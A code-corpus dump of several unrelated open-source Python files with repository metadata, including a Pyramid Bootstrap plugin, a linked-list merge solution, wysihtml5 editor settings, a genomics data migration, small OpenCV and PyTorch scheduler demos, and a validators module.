e8d6e8b9081427bca264d16a679571c35d3527e5
|
[
"BSD-3-Clause"
] | 1
|
2018-04-12T14:27:52.000Z
|
2018-04-12T14:27:52.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Keith Yang'
__email__ = 'yang@keitheis.org'
__version__ = '0.1.0'
from pyramid.settings import asbool
from .bootstrap import BootstrapFactory
def includeme(config):
DEFAULT = {
'versions': '3.0.3',
'use_min_file': True,
'use_cdn': False,
'static_path': {
'cdn': "//netdna.bootstrapcdn.com/bootstrap/",
'local': 'bootstrap/'
},
'cache_max_age': 3600,
}
settings = config.get_settings()
setting_prefix = "bootstrap."
def get_setting(attr, default=None):
return settings.get(setting_prefix + attr, default)
versions = get_setting('versions', DEFAULT['versions'])
use_min_file = asbool(get_setting("use_min_file", DEFAULT['use_min_file']))
bootstraps = BootstrapFactory.build_bootstraps(versions, use_min_file)
use_cdn = asbool(get_setting("use_cdn"))
if use_cdn:
static_path = DEFAULT['static_path']['cdn']
else:
static_path = get_setting('static_path',
DEFAULT['static_path']['local'])
cache_max_age = get_setting('cache_max_age', DEFAULT['cache_max_age'])
for version in bootstraps:
config.add_static_view(static_path + version,
"pyramid_bootstrap:static/{}".format(version),
cache_max_age=cache_max_age)
config.scan('pyramid_bootstrap.event_subscribers')
| 30.244898
| 79
| 0.625506
| 169
| 1,482
| 5.130178
| 0.372781
| 0.080738
| 0.076125
| 0.041522
| 0.062284
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009857
| 0.246964
| 1,482
| 48
| 80
| 30.875
| 0.767025
| 0.02834
| 0
| 0
| 0
| 0
| 0.228095
| 0.06815
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.057143
| 0.028571
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fd224ae58a35451a109abe33921bfe534a36c4b
| 3,043
|
py
|
Python
|
Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | 2
|
2020-05-28T07:15:00.000Z
|
2020-07-21T08:34:06.000Z
|
Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | null | null | null |
Data Structures/Linked List/Merge Two Sorted Linked Lists/merge_two_sorted_linked_lists.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
class SinglyLinkedListNode:
def __init__(self, node_data):
self.data = node_data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None
self.tail = None
def insert_node(self, node_data):
node = SinglyLinkedListNode(node_data)
if not self.head:
self.head = node
else:
self.tail.next = node
self.tail = node
def print_singly_linked_list(node, sep, fptr):
while node:
fptr.write(str(node.data))
node = node.next
if node:
fptr.write(sep)
# Complete the mergeLists function below.
#
# For your reference:
#
# SinglyLinkedListNode:
# int data
# SinglyLinkedListNode next
#
#
def mergeLists(head1, head2):
# dummy head node
head_of_merge = SinglyLinkedListNode( 0 )
merge_point = head_of_merge
cur_1, cur_2 = head1, head2
while( cur_1 is not None and cur_2 is not None):
if cur_1.data <= cur_2.data:
new_node = SinglyLinkedListNode( cur_1.data )
# cur_1 move forward
cur_1 = cur_1.next
else:
new_node = SinglyLinkedListNode( cur_2.data )
# cur_2 move forward
cur_2 = cur_2.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# linked list 1 is empty, dump linked list 2 into merger linked list
while cur_2 is not None:
new_node = SinglyLinkedListNode( cur_2.data )
# cur_2 move forward
cur_2 = cur_2.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# linked list 2 is empty, dump linked list 1 into merger linked list
while cur_1 is not None:
new_node = SinglyLinkedListNode( cur_1.data )
# cur_1 move forward
cur_1 = cur_1.next
# add into merger linked list
merge_point.next = new_node
# merge_point move forward
merge_point = merge_point.next
# read head node of merged linked list = next of dummy head node
real_head = head_of_merge.next
return real_head
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
tests = int(input())
for tests_itr in range(tests):
llist1_count = int(input())
llist1 = SinglyLinkedList()
for _ in range(llist1_count):
llist1_item = int(input())
llist1.insert_node(llist1_item)
llist2_count = int(input())
llist2 = SinglyLinkedList()
for _ in range(llist2_count):
llist2_item = int(input())
llist2.insert_node(llist2_item)
llist3 = mergeLists(llist1.head, llist2.head)
print_singly_linked_list(llist3, ' ', fptr)
fptr.write('\n')
fptr.close()
| 21.58156
| 72
| 0.612882
| 393
| 3,043
| 4.508906
| 0.216285
| 0.073363
| 0.047404
| 0.056433
| 0.386005
| 0.354402
| 0.312077
| 0.301919
| 0.301919
| 0.301919
| 0
| 0.023889
| 0.312192
| 3,043
| 140
| 73
| 21.735714
| 0.822742
| 0.192573
| 0
| 0.231884
| 0
| 0
| 0.009453
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072464
| false
| 0
| 0.072464
| 0
| 0.188406
| 0.028986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3957f752a49e9fed33ab81dcc197e7f08498b9c3
| 4,856
|
py
|
Python
|
wysihtml5/conf/defaults.py
|
vkuryachenko/django-wysihtml5
|
5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0
|
[
"BSD-2-Clause"
] | 4
|
2015-03-24T20:41:31.000Z
|
2021-05-24T15:41:16.000Z
|
wysihtml5/conf/defaults.py
|
vkuryachenko/django-wysihtml5
|
5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0
|
[
"BSD-2-Clause"
] | 1
|
2017-08-06T18:17:53.000Z
|
2017-08-06T18:17:53.000Z
|
wysihtml5/conf/defaults.py
|
vkuryachenko/django-wysihtml5
|
5f6fa86ecbfeccfae61b06386f1f6f44dfca94c0
|
[
"BSD-2-Clause"
] | 3
|
2015-05-14T15:06:21.000Z
|
2021-05-24T15:43:05.000Z
|
#-*- coding: utf-8 -*-
from django.conf import settings
WYSIHTML5_EDITOR = {
# Give the editor a name, the name will also be set as class
# name on the iframe and on the iframe's body
'name': 'null',
# Whether the editor should look like the textarea (by adopting styles)
'style': 'true',
# Id of the toolbar element, pass false if you don't want
# any toolbar logic
'toolbar': 'null',
# Whether urls, entered by the user should automatically become
# clickable-links
'autoLink': 'true',
# Object which includes parser rules (set this to
# examples/rules/spec.json or your own spec, otherwise only span
# tags are allowed!)
'parserRules': 'wysihtml5ParserRules',
# Parser method to use when the user inserts content via copy & paste
'parser': 'wysihtml5.dom.parse || Prototype.K',
# Class name which should be set on the contentEditable element in
# the created sandbox iframe, can be styled via the 'stylesheets' option
'composerClassName': '"wysihtml5-editor"',
# Class name to add to the body when the wysihtml5 editor is supported
'bodyClassName': '"wysihtml5-supported"',
# By default wysihtml5 will insert <br> for line breaks, set this to
# false to use <p>
'useLineBreaks': 'true',
# Array (or single string) of stylesheet urls to be loaded in the
# editor's iframe
'stylesheets': '["%s"]' % (settings.STATIC_URL +
"wysihtml5/css/stylesheet.css"),
# Placeholder text to use, defaults to the placeholder attribute
# on the textarea element
'placeholderText': 'null',
# Whether the composer should allow the user to manually resize
# images, tables etc.
'allowObjectResizing': 'true',
# Whether the rich text editor should be rendered on touch devices
# (wysihtml5 >= 0.3.0 comes with basic support for iOS 5)
'supportTouchDevices': 'true'
}
WYSIHTML5_TOOLBAR = {
"formatBlockHeader": {
"active": True,
"command_name": "formatBlock",
"render_icon": "wysihtml5.widgets.render_formatBlockHeader_icon"
},
"formatBlockParagraph": {
"active": True,
"command_name": "formatBlock",
"render_icon": "wysihtml5.widgets.render_formatBlockParagraph_icon"
},
"bold": {
"active": True,
"command_name": "bold",
"render_icon": "wysihtml5.widgets.render_bold_icon"
},
"italic": {
"active": True,
"command_name": "italic",
"render_icon": "wysihtml5.widgets.render_italic_icon"
},
"underline": {
"active": True,
"command_name": "underline",
"render_icon": "wysihtml5.widgets.render_underline_icon"
},
"justifyLeft": {
"active": True,
"command_name": "justifyLeft",
"render_icon": "wysihtml5.widgets.render_justifyLeft_icon"
},
"justifyCenter": {
"active": True,
"command_name": "justifyCenter",
"render_icon": "wysihtml5.widgets.render_justifyCenter_icon"
},
"justifyRight": {
"active": True,
"command_name": "justifyRight",
"render_icon": "wysihtml5.widgets.render_justifyRight_icon"
},
"insertOrderedList": {
"active": True,
"command_name": "insertOrderedList",
"render_icon": "wysihtml5.widgets.render_insertOrderedList_icon"
},
"insertUnorderedList": {
"active": True,
"command_name": "insertUnorderedList",
"render_icon": "wysihtml5.widgets.render_insertUnorderedList_icon"
},
"insertImage": {
"active": True,
"command_name": "insertImage",
"render_icon": "wysihtml5.widgets.render_insertImage_icon",
"render_dialog": "wysihtml5.widgets.render_insertImage_dialog"
},
"createLink": {
"active": True,
"command_name": "createLink",
"render_icon": "wysihtml5.widgets.render_createLink_icon",
"render_dialog": "wysihtml5.widgets.render_createLink_dialog"
},
"insertHTML": {
"active": True,
"command_name": "insertHTML",
"command_value": "<blockquote>quote</blockquote>",
"render_icon": "wysihtml5.widgets.render_insertHTML_icon"
},
"foreColor": {
"active": True,
"command_name": "foreColor",
"render_icon": "wysihtml5.widgets.render_foreColor_icon"
},
"changeView": {
"active": True,
"command_name": "change_view",
"render_icon": "wysihtml5.widgets.render_changeView_icon"
},
}
# This is necessary to protect the field of content in cases where
# the user disables JavaScript in the browser, so that Wysihtml5 can't
# do the filter job.
WYSIHTML5_ALLOWED_TAGS = ('h1 h2 h3 h4 h5 h6 div p b i u'
' ul ol li span img a blockquote')
| 36.787879
| 76
| 0.635914
| 523
| 4,856
| 5.764818
| 0.380497
| 0.090216
| 0.124046
| 0.104478
| 0.205638
| 0.067662
| 0.042454
| 0.042454
| 0.042454
| 0.042454
| 0
| 0.010953
| 0.247941
| 4,856
| 131
| 77
| 37.068702
| 0.814622
| 0.281301
| 0
| 0.171717
| 0
| 0
| 0.556326
| 0.22877
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010101
| 0
| 0.010101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
395a96908738ec18c9180da4437fee979a2a2992
| 6,496
|
py
|
Python
|
protocols/migration/migration_participant_100_to_reports_300.py
|
Lucioric2000/GelReportModels
|
1704cdea3242d5b46c8b81ef46553ccae2799435
|
[
"Apache-2.0"
] | 14
|
2016-09-22T10:10:01.000Z
|
2020-09-23T11:40:37.000Z
|
protocols/migration/migration_participant_100_to_reports_300.py
|
Lucioric2000/GelReportModels
|
1704cdea3242d5b46c8b81ef46553ccae2799435
|
[
"Apache-2.0"
] | 159
|
2016-09-22T11:08:46.000Z
|
2021-09-29T13:55:52.000Z
|
protocols/migration/migration_participant_100_to_reports_300.py
|
Lucioric2000/GelReportModels
|
1704cdea3242d5b46c8b81ef46553ccae2799435
|
[
"Apache-2.0"
] | 17
|
2016-09-20T13:31:58.000Z
|
2020-10-19T04:58:19.000Z
|
from protocols import reports_3_0_0 as participant_old
from protocols import participant_1_0_0
from protocols.migration import BaseMigration
class MigrationParticipants100ToReports(BaseMigration):
old_model = participant_1_0_0
new_model = participant_old
def migrate_pedigree(self, old_instance):
"""
:param old_instance: org.gel.models.participant.avro.Pedigree 1.0.0
:rtype: org.gel.models.report.avro RDParticipant.Pedigree 3.0.0
"""
new_instance = self.convert_class(self.new_model.Pedigree, old_instance)
new_instance.versionControl = self.new_model.VersionControl()
new_instance.gelFamilyId = old_instance.familyId
new_instance.participants = self.convert_collection(
old_instance.members, self._migrate_member_to_participant, family_id=old_instance.familyId)
return self.validate_object(object_to_validate=new_instance, object_type=self.new_model.Pedigree)
def _migrate_member_to_participant(self, old_member, family_id):
new_instance = self.convert_class(self.new_model.RDParticipant, old_member)
new_instance.gelFamilyId = family_id
new_instance.pedigreeId = old_member.pedigreeId or 0
new_instance.isProband = old_member.isProband or False
new_instance.gelId = old_member.participantId
new_instance.sex = self._migrate_sex(old_sex=old_member.sex)
new_instance.personKaryotipicSex = self._migrate_person_karyotypic_sex(old_pks=old_member.personKaryotypicSex)
if old_member.yearOfBirth is not None:
new_instance.yearOfBirth = str(old_member.yearOfBirth)
new_instance.adoptedStatus = self._migrate_adopted_status(old_status=old_member.adoptedStatus)
new_instance.lifeStatus = self._migrate_life_status(old_status=old_member.lifeStatus)
new_instance.affectionStatus = self._migrate_affection_status(old_status=old_member.affectionStatus)
new_instance.hpoTermList = self.convert_collection(
old_member.hpoTermList, self._migrate_hpo_term, default=[])
new_instance.samples = self.convert_collection(old_member.samples, lambda s: s .sampleId)
new_instance.versionControl = self.new_model.VersionControl()
if old_member.consentStatus is None:
new_instance.consentStatus = self.new_model.ConsentStatus(
programmeConsent=True, primaryFindingConsent=True, secondaryFindingConsent=True,
carrierStatusConsent=True
)
if old_member.ancestries is None:
new_instance.ancestries = self.new_model.Ancestries()
if old_member.consanguineousParents is None:
new_instance.consanguineousParents = self.new_model.TernaryOption.unknown
if new_instance.disorderList is None:
new_instance.disorderList = []
return new_instance
def _migrate_hpo_term(self, old_term):
new_instance = self.convert_class(target_klass=self.new_model.HpoTerm, instance=old_term) # type: self.new_model.HpoTerm
new_instance.termPresence = self._migrate_ternary_option_to_boolean(ternary_option=old_term.termPresence)
return new_instance
def _migrate_ternary_option_to_boolean(self, ternary_option):
ternary_map = {
self.old_model.TernaryOption.no: False,
self.old_model.TernaryOption.yes: True,
}
return ternary_map.get(ternary_option, None)
def _migrate_affection_status(self, old_status):
status_map = {
self.old_model.AffectionStatus.AFFECTED: self.new_model.AffectionStatus.affected,
self.old_model.AffectionStatus.UNAFFECTED: self.new_model.AffectionStatus.unaffected,
self.old_model.AffectionStatus.UNCERTAIN: self.new_model.AffectionStatus.unknown,
}
return status_map.get(old_status, self.new_model.AffectionStatus.unknown)
def _migrate_life_status(self, old_status):
status_map = {
self.old_model.LifeStatus.ABORTED: self.new_model.LifeStatus.aborted,
self.old_model.LifeStatus.ALIVE: self.new_model.LifeStatus.alive,
self.old_model.LifeStatus.DECEASED: self.new_model.LifeStatus.deceased,
self.old_model.LifeStatus.UNBORN: self.new_model.LifeStatus.unborn,
self.old_model.LifeStatus.STILLBORN: self.new_model.LifeStatus.stillborn,
self.old_model.LifeStatus.MISCARRIAGE: self.new_model.LifeStatus.miscarriage,
}
return status_map.get(old_status, self.new_model.LifeStatus.alive)
def _migrate_adopted_status(self, old_status):
status_map = {
self.old_model.AdoptedStatus.notadopted: self.new_model.AdoptedStatus.not_adopted,
self.old_model.AdoptedStatus.adoptedin: self.new_model.AdoptedStatus.adoptedin,
self.old_model.AdoptedStatus.adoptedout: self.new_model.AdoptedStatus.adoptedout,
}
return status_map.get(old_status, self.new_model.AdoptedStatus.not_adopted)
def _migrate_person_karyotypic_sex(self, old_pks):
pks_map = {
self.old_model.PersonKaryotipicSex.UNKNOWN: self.new_model.PersonKaryotipicSex.unknown,
self.old_model.PersonKaryotipicSex.XX: self.new_model.PersonKaryotipicSex.XX,
self.old_model.PersonKaryotipicSex.XY: self.new_model.PersonKaryotipicSex.XY,
self.old_model.PersonKaryotipicSex.XO: self.new_model.PersonKaryotipicSex.XO,
self.old_model.PersonKaryotipicSex.XXY: self.new_model.PersonKaryotipicSex.XXY,
self.old_model.PersonKaryotipicSex.XXX: self.new_model.PersonKaryotipicSex.XXX,
self.old_model.PersonKaryotipicSex.XXYY: self.new_model.PersonKaryotipicSex.XXYY,
self.old_model.PersonKaryotipicSex.XXXY: self.new_model.PersonKaryotipicSex.XXXY,
self.old_model.PersonKaryotipicSex.XXXX: self.new_model.PersonKaryotipicSex.XXXX,
self.old_model.PersonKaryotipicSex.XYY: self.new_model.PersonKaryotipicSex.XYY,
self.old_model.PersonKaryotipicSex.OTHER: self.new_model.PersonKaryotipicSex.other,
}
return pks_map.get(old_pks)
def _migrate_sex(self, old_sex):
sex_map = {
self.old_model.Sex.MALE: self.new_model.Sex.male,
self.old_model.Sex.FEMALE: self.new_model.Sex.female,
self.old_model.Sex.UNKNOWN: self.new_model.Sex.unknown,
}
return sex_map.get(old_sex, self.new_model.Sex.undetermined)
| 56.982456
| 129
| 0.736761
| 768
| 6,496
| 5.924479
| 0.161458
| 0.072088
| 0.105495
| 0.074945
| 0.183956
| 0.104396
| 0.091648
| 0.069231
| 0.052088
| 0
| 0
| 0.003584
| 0.183805
| 6,496
| 113
| 130
| 57.486726
| 0.854583
| 0.024784
| 0
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091837
| false
| 0
| 0.030612
| 0
| 0.244898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
395f29ec9cf26aad90082c0bbf20534ee8f84d4b
| 788
|
py
|
Python
|
getting_setting.py
|
madhurgupta96/Image-Fundamentals-with-OpenCV
|
890fcce30155e98ab66e206c3511d77040570ec5
|
[
"Apache-2.0"
] | null | null | null |
getting_setting.py
|
madhurgupta96/Image-Fundamentals-with-OpenCV
|
890fcce30155e98ab66e206c3511d77040570ec5
|
[
"Apache-2.0"
] | null | null | null |
getting_setting.py
|
madhurgupta96/Image-Fundamentals-with-OpenCV
|
890fcce30155e98ab66e206c3511d77040570ec5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 15 23:52:04 2020
@author: Madhur Gupta
"""
from __future__ import print_function
import cv2
import argparse
ap=argparse.ArgumentParser()
ap.add_argument('-i','--image',required=True,help='path to image')
args=vars(ap.parse_args())
image=cv2.imread(args['image'])
cv2.imshow("Original", image)
#setting 0,0 as red pixel
(b,g,r)=image[0,0]
print("Pixel at (0, 0) - Red: {}, Green: {}, Blue: {}".format(r,g, b))
image[0, 0] = (0, 0, 255)
(b, g, r) = image[0, 0]
print("Pixel at (0, 0) - Red: {}, Green: {}, Blue: {}".format(r,g, b))
#setting the corner of image as green
corner=image[0:100,0:100]
cv2.imshow('corner',corner)
image[0:100,0:100]=(0,255,0)
cv2.imshow('Updated',image)
cv2.waitKey(0)
| 22.514286
| 71
| 0.619289
| 132
| 788
| 3.643939
| 0.439394
| 0.033264
| 0.043659
| 0.033264
| 0.266112
| 0.266112
| 0.18711
| 0.18711
| 0.18711
| 0.18711
| 0
| 0.088685
| 0.170051
| 788
| 34
| 72
| 23.176471
| 0.646789
| 0.178934
| 0
| 0.222222
| 0
| 0
| 0.232172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
395f821293e57d64e71d8ac788f63dcdb5e4e300
| 3,815
|
py
|
Python
|
dictator/validators/base.py
|
brunosmmm/dictator
|
60314734b9d0c378fad77d296c8946165f372400
|
[
"MIT"
] | null | null | null |
dictator/validators/base.py
|
brunosmmm/dictator
|
60314734b9d0c378fad77d296c8946165f372400
|
[
"MIT"
] | null | null | null |
dictator/validators/base.py
|
brunosmmm/dictator
|
60314734b9d0c378fad77d296c8946165f372400
|
[
"MIT"
] | null | null | null |
"""Base validators."""
import re
from dictator.errors import ValidationError
from dictator.validators import Validator
from typing import Type, Callable, Any, Tuple, Union
HEX_REGEX = re.compile(r"^(0x)?([0-9A-Fa-f]+)$")
BIN_REGEX = re.compile(r"^(0b)?([0-1]+)$")
class ValidateType(Validator):
"""Type validator.
Validates if an object is from a certain Python type.
"""
_DEFAULT_NAME = "type"
def __init__(self, *_types: Type):
"""Initialize.
Parameters
----------
type
The expected python type
"""
super().__init__()
self._types = _types
@property
def target_types(self) -> Tuple[Type, ...]:
"""Get target type."""
return self._types
def validate(self, _value, **kwargs):
"""Perform validation."""
if not isinstance(_value, self.target_types):
raise ValidationError(f"value has unexpected type")
return _value
class ValidatorFactory(Validator):
"""Validator factory.
Create a validator class from a validation function.
"""
def __init__(self, validate_fn: Union[Callable, Validator], **kwargs):
"""Initialize.
Parameters
----------
validate_fn
Some callable that performs actual validation
"""
super().__init__(**kwargs)
if not callable(validate_fn):
raise TypeError("validate_fn must be callable")
if isinstance(validate_fn, Validator):
self._validatefn = validate_fn.validate
else:
self._validatefn = validate_fn
def validate(self, _value, **kwargs):
"""Perform validation."""
return self._validatefn(_value, **kwargs)
def _validate_integer(_value: Any, **kwargs: Any) -> int:
"""Validate integer value.
Parameters
----------
_value
Some value
kwargs
Other metadata
"""
if isinstance(_value, str):
# try converting
h = HEX_REGEX.match(_value)
b = BIN_REGEX.match(_value)
if h is not None:
if h.group(1) is None and b is not None:
# is actually binary
return int(h.group(2), 2)
return int(h.group(2), 16)
raise ValidationError("cannot validate as integer")
elif isinstance(_value, bool):
raise ValidationError("cannot validate as integer, got boolean")
elif isinstance(_value, int):
return _value
raise ValidationError("cannot validate as integer")
validate_string = ValidatorFactory(ValidateType(str))
validate_list = ValidatorFactory(ValidateType(tuple, list))
validate_dict = ValidatorFactory(ValidateType(dict))
validate_boolean = ValidatorFactory(ValidateType(bool))
validate_float = ValidatorFactory(ValidateType(float))
validate_integer = ValidatorFactory(_validate_integer)
validate_string_pre = ValidatorFactory(ValidateType(str), after_fn=False)
validate_list_pre = ValidatorFactory(ValidateType(tuple, list), after_fn=False)
validate_dict_pre = ValidatorFactory(ValidateType(dict), after_fn=False)
validate_boolean_pre = ValidatorFactory(ValidateType(bool), after_fn=False)
validate_float_pre = ValidatorFactory(ValidateType(float), after_fn=False)
validate_integer_pre = ValidatorFactory(_validate_integer, after_fn=False)
def validate_null(_value: Any, **kwargs: Any) -> None:
"""Validate null value.
Parameters
---------
_value
Some value
kwargs
Other metadata
"""
if _value is not None:
raise ValidationError("value is not null")
return _value
DEFAULT_VALIDATOR_BY_TYPE = {
int: validate_integer,
str: validate_string,
list: validate_list,
dict: validate_dict,
bool: validate_boolean,
float: validate_float,
}
| 27.644928
| 79
| 0.654522
| 419
| 3,815
| 5.732697
| 0.257757
| 0.11657
| 0.029975
| 0.041632
| 0.144463
| 0.131141
| 0.077435
| 0.041632
| 0.041632
| 0
| 0
| 0.004122
| 0.236959
| 3,815
| 137
| 80
| 27.846715
| 0.821024
| 0.158322
| 0
| 0.104478
| 0
| 0
| 0.066978
| 0.006998
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104478
| false
| 0
| 0.059701
| 0
| 0.313433
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3960d947244ab5cacdb399b505a02597c36f0c4b
| 554
|
py
|
Python
|
copasi_test/ReportParserMoieties.py
|
copasi/python-copasi-testsuite
|
604ce52f95b4a0e2631712b22c331cd8c263bd05
|
[
"Artistic-2.0"
] | null | null | null |
copasi_test/ReportParserMoieties.py
|
copasi/python-copasi-testsuite
|
604ce52f95b4a0e2631712b22c331cd8c263bd05
|
[
"Artistic-2.0"
] | null | null | null |
copasi_test/ReportParserMoieties.py
|
copasi/python-copasi-testsuite
|
604ce52f95b4a0e2631712b22c331cd8c263bd05
|
[
"Artistic-2.0"
] | null | null | null |
from .ReportParser import ReportParser
class ReportParserMoieties(ReportParser):
def __init__(self):
ReportParser.__init__(self)
def parseLines(self, lines):
# type: ([str]) -> None
current = self.skip_until(lines, 0, 'Link matrix(ann)')
if current == -1:
return
current = self.readAnnotatedMatrix(lines, current)
current = self.skip_until(lines, current, 'Stoichiometry(ann)')
if current == -1:
return
current = self.readAnnotatedMatrix(lines, current)
| 29.157895
| 71
| 0.628159
| 55
| 554
| 6.145455
| 0.454545
| 0.130178
| 0.088757
| 0.118343
| 0.508876
| 0.360947
| 0.360947
| 0.360947
| 0.360947
| 0.360947
| 0
| 0.007353
| 0.263538
| 554
| 18
| 72
| 30.777778
| 0.821078
| 0.037906
| 0
| 0.461538
| 0
| 0
| 0.06403
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.076923
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
396309f795615e199934ec29198bf8e06add077e
| 1,087
|
py
|
Python
|
relationship_classifiction/test.py
|
suolyer/PyTorch_BERT_Pipeline_IE
|
869a1fc937e268a565f5b30a2105a460b4e07f59
|
[
"MIT"
] | 8
|
2021-05-23T02:04:09.000Z
|
2022-01-14T08:58:42.000Z
|
relationship_classifiction/test.py
|
2019hong/PyTorch_BERT_Pipeline_IE
|
9ee66bc9ceaed42e996e9b2414612de3fc0b23bb
|
[
"MIT"
] | 2
|
2021-05-14T00:34:45.000Z
|
2021-08-08T08:36:33.000Z
|
relationship_classifiction/test.py
|
2019hong/PyTorch_BERT_Pipeline_IE
|
9ee66bc9ceaed42e996e9b2414612de3fc0b23bb
|
[
"MIT"
] | 1
|
2021-09-28T15:15:44.000Z
|
2021-09-28T15:15:44.000Z
|
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import CosineAnnealingLR, CosineAnnealingWarmRestarts
import itertools
import matplotlib.pyplot as plt
initial_lr = 0.1
class model(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3)
def forward(self, x):
pass
net_1 = model()
optimizer_1 = torch.optim.Adam(net_1.parameters(), lr=initial_lr)
scheduler_1 = CosineAnnealingWarmRestarts(optimizer_1, T_0=1)
print("初始化的学习率:", optimizer_1.defaults['lr'])
lr_list = [] # 把使用过的lr都保存下来,之后画出它的变化
for epoch in range(0, 6):
# train
for i in range(int(30000/32)):
optimizer_1.zero_grad()
optimizer_1.step()
print("第%d个epoch的学习率:%f" % (epoch, optimizer_1.param_groups[0]['lr']))
lr_list.append(optimizer_1.param_groups[0]['lr'])
scheduler_1.step((epoch+i+1)/int(30000/32))
# 画出lr的变化
plt.plot(lr_list)
plt.xlabel("epoch")
plt.ylabel("lr")
plt.title("learning rate's curve changes as epoch goes on!")
plt.show()
| 24.155556
| 83
| 0.689052
| 159
| 1,087
| 4.509434
| 0.484277
| 0.097629
| 0.033473
| 0.058577
| 0.066946
| 0.066946
| 0
| 0
| 0
| 0
| 0
| 0.043527
| 0.175713
| 1,087
| 44
| 84
| 24.704545
| 0.756696
| 0.032199
| 0
| 0
| 0
| 0
| 0.080229
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0.034483
| 0.172414
| 0
| 0.275862
| 0.068966
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
39642b71284a9db7523df49c8dca22286f61d556
| 1,236
|
py
|
Python
|
examples/linear_regression/01_linear_regression.py
|
zhaoshiying97/trading_gym
|
d4af8d724efa17420e6ebb430f6f9d4f08c6f83a
|
[
"Apache-2.0"
] | 32
|
2019-12-06T19:23:51.000Z
|
2022-03-08T06:08:58.000Z
|
examples/linear_regression/01_linear_regression.py
|
zhaoshiying97/trading_gym
|
d4af8d724efa17420e6ebb430f6f9d4f08c6f83a
|
[
"Apache-2.0"
] | 2
|
2020-02-20T11:04:07.000Z
|
2020-03-12T08:47:54.000Z
|
examples/linear_regression/01_linear_regression.py
|
zhaoshiying97/trading_gym
|
d4af8d724efa17420e6ebb430f6f9d4f08c6f83a
|
[
"Apache-2.0"
] | 15
|
2019-12-12T07:43:34.000Z
|
2022-03-06T13:02:39.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pdb
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from trading_gym.utils.data.toy import create_toy_data
